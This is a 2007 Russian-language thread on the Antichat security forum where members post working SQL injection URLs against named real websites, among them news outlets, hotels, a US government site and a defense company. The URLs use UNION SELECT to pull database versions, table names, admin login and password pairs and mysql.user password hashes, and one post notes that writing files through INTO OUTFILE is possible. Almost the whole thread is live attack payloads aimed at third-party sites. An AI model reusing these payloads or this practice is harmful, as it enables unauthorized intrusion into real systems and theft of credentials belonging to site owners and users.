HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.02.2007, 01:22
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spyder  
2 _Pantera_
не правда. иногда используя INFORMATION_SCHEMA выводится только одна таблица и тогда надо использовать LIMIT
Но здесь почему то не работает
Код:
http://www.solyaris.ru/rinok_hi-fi/statyi_testi_obzory/?part=1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15+from+INFORMATION_SCHEMA.TABLES+limit+1,666/*
и там по страничкам полистаешь, ог?
 
Ответить с цитированием

  #2  
Старый 28.02.2007, 01:41
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.podmoskowie.ru/index.php?c_id=3&o_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20/*
http://www.podmoskowie.ru/index.php?c_id=3&o_id=9999+union+select+1,2,3,4,5,6,7,8,9,10,concat(login,0x3a,pwd),12,13,14,15,16,17,18,19,20+from+lnkxchange_admins/*

Последний раз редактировалось n1†R0x; 28.02.2007 в 01:49..
 
Ответить с цитированием

  #3  
Старый 28.02.2007, 01:44
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://fsrio.nal.usda.gov/news_article.php?article_id=-10+union+select+1,2,3,4,5,6,7,8,9,10
=)
 
Ответить с цитированием

  #4  
Старый 28.02.2007, 02:21
Underwit
Banned
Регистрация: 06.10.2006
Сообщений: 288
Провел на форуме:
2741921

Репутация: 469
По умолчанию

http://www.travellatvia.lv/8/90/0/ru/?main=5&reg=1'
 
Ответить с цитированием

  #5  
Старый 28.02.2007, 04:26
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

через раз отвечало мне internal error, так что не доделал:
Цитата:
__http://www.frogview.com/show.php?file=-981+union+select+convert(table_name+using+latin1), 2,3,4+from+INFORMATION_SCHEMA.TABLES/*

чего-то колонки в Customers не вытянул
Цитата:
__http://www.tvtix.com/show.php?eventID=-47+union+select+111,2,3,4,5,6,7,8,9,10,1111,2,3,4, 5,6,7,8,9,10,11111,2,3,4,5,6,7,8,9,10,table_name,2 ,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+3,1/*
__http://www.tvtix.com/show.php?eventID=-47+union+select+111,2,3,4,5,6,7,8,9,10,1111,2,3,4, 5,6,7,8,9,10,11111,2,3,4,5,6,7,8,9,10,table_name,2 ,3,4,5,6+FROM+INFORMATION_SCHEMA.TABLES+limit+16,1/*

Последний раз редактировалось Thanat0z; 28.02.2007 в 05:06..
 
Ответить с цитированием

  #6  
Старый 28.02.2007, 14:55
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://timesreporter.com/index.php?ID=-9+union+select+1,version(),3,4,5,6,7,8,9/*&r=2
=\
 
Ответить с цитированием

  #7  
Старый 28.02.2007, 15:30
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Моя первая скуль...
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-9%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23/*&mode=chrono&order=0

P.S. Если кто-нибудь доведет её до ума, я буду благодарен...

Последний раз редактировалось Iceangel_; 28.02.2007 в 15:36..
 
Ответить с цитированием

  #8  
Старый 28.02.2007, 15:33
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.italyhotel.ru/index.php?d=stadt&id=-29+union+select+1,2,3,4,5,6,7,8,9,password,11,user +from+mysql.user/*
 
Ответить с цитированием

  #9  
Старый 28.02.2007, 17:17
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.multidmedia.com/news/news.php?id=-62+union+select+1,2,VERSION(),4,5/*

http://www.trud.ru/issue/news.php?id=-2215+union+select+1,2,5,4,5,6,7/*

http://www.almaz-antey.ru/news.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+u sers/*

http://www.whenhamstersattack.com/news.php?id=-4+union+select+1,2,3,4,5,6,7/*

http://www.mostrud.ru/news.php?id=-48+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.us er/*

http://www.footballfoundation.com/news.php?id=-581+union+select+1,2,3,4,5,6,7+from+mysql.user/*

http://www.gamersinfo.net/content/news.php?id=-168+union+select+1,2,3,4,5,6,7,8,9+from+user/*

http://fishres.ru/news/news.php?id=-4471+union+select+1,2,3,4,5,6,7,8,9/*

http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12 +from+mysql.user/*

http://www.akdgs.ru/news.php?id=-49+union+select+1,2,3,4,5,6/*

http://www.marchespublics.net/actualite/news.php?id=-635+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18/*

http://www.filmdeculte.com/news/news.php?id=-3094+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.tabdc.org/news.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5/*

http://www.abajour.ru/news.php?id=-19+union+select+1,2,3,4,5/*

http://www.liverpoolfc.ru/news.php?id=-859+union+select+1,2,3,4,5,6+from+users/*
 
Ответить с цитированием

  #10  
Старый 28.02.2007, 18:09
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.swisshotel.ru/index.php?d=stadt&id=-1+union+select+1,2,3,4,5,6,7,8,9,password,11,12+fr om+mysql.user/*

Into Outfile можно применить!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ